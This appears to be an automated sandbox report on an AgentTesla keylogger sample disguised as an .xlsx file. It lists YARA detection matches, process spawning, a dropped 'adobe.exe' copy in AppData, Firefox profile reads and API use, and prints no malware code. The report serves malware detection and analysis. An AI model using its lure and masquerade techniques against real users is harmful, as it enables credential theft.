                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.7be0000.8.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 0_2_0136D5BC0_2_0136D5BC
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 0_2_04DD85D80_2_04DD85D8
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 0_2_04DD65480_2_04DD6548
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 0_2_04DD65600_2_04DD6560
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 0_2_04DD6DD00_2_04DD6DD0
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 0_2_04DDCE380_2_04DDCE38
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 0_2_04DD8F880_2_04DD8F88
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 0_2_04DD8F770_2_04DD8F77
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 0_2_04DD69980_2_04DD6998
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 0_2_04DD69880_2_04DD6988
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 0_2_053500060_2_05350006
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 0_2_053500400_2_05350040
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 0_2_05356BC80_2_05356BC8
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_02C0B3972_2_02C0B397
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_02C04A902_2_02C04A90
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_02C0EEA82_2_02C0EEA8
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_02C03E782_2_02C03E78
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_02C041C02_2_02C041C0
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_069C289B2_2_069C289B
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_069C28A82_2_069C28A8
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_06A1C0F82_2_06A1C0F8
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_06A130182_2_06A13018
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_06A161602_2_06A16160
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_06A151502_2_06A15150
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_06A1AD902_2_06A1AD90
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_06A178F82_2_06A178F8
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_06A172182_2_06A17218
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_06A1E3282_2_06A1E328
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_06A123402_2_06A12340
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_06A100402_2_06A10040
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_06A1584F2_2_06A1584F
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_06A100062_2_06A10006
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_0149D5BC3_2_0149D5BC
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_04EA3AE83_2_04EA3AE8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_04EA66903_2_04EA6690
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_04EA87083_2_04EA8708
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_04EA90A93_2_04EA90A9
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_04EA90B83_2_04EA90B8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_04EACFB03_2_04EACFB0
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_04EA6F003_2_04EA6F00
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_04EA6AC83_2_04EA6AC8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_04EA6AB83_2_04EA6AB8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_0106E8A84_2_0106E8A8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_01064A904_2_01064A90
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_01063E784_2_01063E78
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_010641C04_2_010641C0
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_068817344_2_06881734
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_068824584_2_06882458
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_068824684_2_06882468
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_0688315F4_2_0688315F
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_068934184_2_06893418
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_068955504_2_06895550
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_068965604_2_06896560
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_0689C0F84_2_0689C0F8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_0689B1984_2_0689B198
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06897CF84_2_06897CF8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_068976184_2_06897618
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_068927434_2_06892743
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_0689E3284_2_0689E328
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_068900404_2_06890040
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06895C4F4_2_06895C4F
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_0689003F4_2_0689003F
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_0127D5BC6_2_0127D5BC
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_02B183786_2_02B18378
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_02B165606_2_02B16560
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_02B165486_2_02B16548
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_02B169986_2_02B16998
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_02B169886_2_02B16988
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_02B18F886_2_02B18F88
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_02B18F776_2_02B18F77
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_02B16DD06_2_02B16DD0
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_00E14A908_2_00E14A90
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_00E13E788_2_00E13E78
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_00E141C08_2_00E141C0
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066917348_2_06691734
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066924688_2_06692468
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_0669245A8_2_0669245A
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_0669315E8_2_0669315E
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066A34188_2_066A3418
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066A65608_2_066A6560
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066A55508_2_066A5550
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066AC0F88_2_066AC0F8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066AB1988_2_066AB198
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066A7CF88_2_066A7CF8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066A76188_2_066A7618
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066A27428_2_066A2742
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066AE3288_2_066AE328
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066A00408_2_066A0040
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066A5C4F8_2_066A5C4F
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_066A003E8_2_066A003E
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1644979202.000000000479E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PRE ALERT Docs_PONBOM01577.xlsx.exe
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1647589212.0000000007BE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs PRE ALERT Docs_PONBOM01577.xlsx.exe
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1642496723.000000000101E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PRE ALERT Docs_PONBOM01577.xlsx.exe
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1644979202.0000000003DC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea9d26a1c-7dc5-441c-98a8-6dd01f6d79df.exe4 vs PRE ALERT Docs_PONBOM01577.xlsx.exe
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000000.1626505579.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameslZY.exeR vs PRE ALERT Docs_PONBOM01577.xlsx.exe
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1644376716.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs PRE ALERT Docs_PONBOM01577.xlsx.exe
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1644376716.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea9d26a1c-7dc5-441c-98a8-6dd01f6d79df.exe4 vs PRE ALERT Docs_PONBOM01577.xlsx.exe
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1645970706.0000000004DE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PRE ALERT Docs_PONBOM01577.xlsx.exe
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4095305083.0000000000BB9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PRE ALERT Docs_PONBOM01577.xlsx.exe
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeBinary or memory string: OriginalFilenameslZY.exeR vs PRE ALERT Docs_PONBOM01577.xlsx.exe
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 4.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 3.2.adobe.exe.3ec1420.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.adobe.exe.3ec1420.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 3.2.adobe.exe.3efca40.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.adobe.exe.3efca40.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 3.2.adobe.exe.3efca40.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.adobe.exe.3efca40.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 3.2.adobe.exe.3ec1420.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.adobe.exe.3ec1420.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: adobe.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, yNzg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, yNzg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, yNzg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, yNzg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, KNymkUU5gB.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, KNymkUU5gB.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, LPE.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, LPE.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, c2nuaZ1j2jxTrWK6iR.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, c2nuaZ1j2jxTrWK6iR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, c2nuaZ1j2jxTrWK6iR.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, c2nuaZ1j2jxTrWK6iR.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, c2nuaZ1j2jxTrWK6iR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, c2nuaZ1j2jxTrWK6iR.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, c2nuaZ1j2jxTrWK6iR.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, c2nuaZ1j2jxTrWK6iR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, c2nuaZ1j2jxTrWK6iR.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, GSnIefby3g48AVtXRC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, c2nuaZ1j2jxTrWK6iR.csSecurity API names: _0020.SetAccessControl
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, c2nuaZ1j2jxTrWK6iR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, c2nuaZ1j2jxTrWK6iR.csSecurity API names: _0020.AddAccessRule
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, GSnIefby3g48AVtXRC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, GSnIefby3g48AVtXRC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, GSnIefby3g48AVtXRC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/4@2/2
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PRE ALERT Docs_PONBOM01577.xlsx.exe.logJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMutant created: NULL
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeReversingLabs: Detection: 23%
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeVirustotal: Detection: 29%
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeFile read: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe "C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe"
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess created: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe "C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess created: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe "C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: gpapi.dllJump to behavior
